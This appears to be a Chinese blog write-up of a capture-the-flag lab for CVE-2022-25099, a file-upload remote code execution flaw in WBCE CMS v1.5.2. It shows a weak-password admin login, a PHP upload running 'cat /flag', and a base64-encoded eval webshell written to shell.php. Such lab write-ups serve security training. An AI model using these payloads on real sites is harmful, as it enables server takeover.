春秋云境:CVE-2022-25099

已于 2024-03-08 12:59:55 修改
阅读量1.3k 收藏 2
点赞数 2
分类专栏: 春秋云境-靶场 文章标签: 安全 系统安全 安全漏洞 网络安全 cve
于 2022-12-01 16:26:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128134178
版权

春秋云境:CVE-2022-25099

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……

WBCE CMS v1.5.2 RCE:CVE-2022-25099

在这里插入图片描述

漏洞介绍

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE

解题步骤

  1. 访问URL,通过弱口令登录后台:admin/123456
    在这里插入图片描述

  2. 题目中提示的路径无法直接访问,需要通过图中位置进行文件上传
    在这里插入图片描述

  3. 选择shell文件进行上传
    在这里插入图片描述

  4. 我的shell文件中写了个phpinfo,此时也可以看到phpinfo被解析了,但是再访问这个页面,所以得重新构造我们的shell
    在这里插入图片描述

  5. 可以使用直接上传下面的php运行读取flag,如下:

<?php

system('cat /flag');

phpinfo();

?>

在这里插入图片描述
在这里插入图片描述

  1. 或者使用filefile_put_contents将shell写入文件直接拿网站
file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTtlY2hvIDEyMztwaHBpbmZvKCk7Pz4='));

在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WBCE CMS安全漏洞(CVE-2022-25099)
千寻的博客
12-09 2324
WBCE CMS v1.5.2的` /language/install.php `文件存在漏洞,攻击者可精心构造文件上传造成`RCE`
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云境CVE-2022-25099(文件上传造成RCE)
m0_65712192的博客
04-22 993
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
春秋云境CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
果粒程
12-01 712
春秋云境CVE-2022-25099靶场WP和CVE-2022-24663靶场WP
CVE-2022-25099
龙狼刺的博客
06-25 458
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
春秋云镜 CVE-2022-25099
qq_22002773的博客
07-05 183
春秋云镜 CVE-2022-25099
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 624
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
WBCE CMS v1.5.2 远程命令执行漏洞(CVE-2022-25099
最新发布
Flag少侠的博客
07-05 9147
打开靶场访问显示正在建设中网上去找这个 CMS 的版本源码需要加上 /admin/login/ 进入登录页面用户名密码弱口令:admin/123456在 Add-ons 中找到 Languages点进去可以看到上传文件选择好一句话木马文件打开 BurpSuite 开启拦截,将类型修改为图片报错了?修改下内容重新尝试可以看到被正常解析了,说明一句话木马不可行,但是可以在这个文件中执行命令成功拿到 flag。
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2472
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2470
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
WBCE CMS任意文件上传漏洞(CVE-2022-25099
weixin_68999845的博客
07-21 1125
WBCE CMS 存在安全漏洞,该漏洞源于 /languages/index.php 中的漏洞允许攻击者通过精心设计的 PHP 文件执行任意代码。源码下载url:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.5.2.zip。上传路径为 /admin/languages/install.php,在post body部分可以看到明显的恶意payload。1.按照源码下载:https://github.com/WBCE/WBCE_CMS。
春秋云境CVE-2022-23906
一只爱吃橙子的羊
12-06 1165
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
春秋云境CVE-2022-24663复现
小高工作室
11-24 2395
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
WBCE CMS v1.5.2 RCE(CVE-2022-25099)漏洞复现
qq_70303095的博客
10-20 2115
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE。
[春秋云镜] CVE-2022-32991 靶场详解
weixin_60374959的博客
11-23 2172
本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。-p 指定注入的参数--batch 使用默认方法去执行sql注入--random-agent 随机更换请求头--user-agent 使用指定的请求头--cookie 使用指定cookie。
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值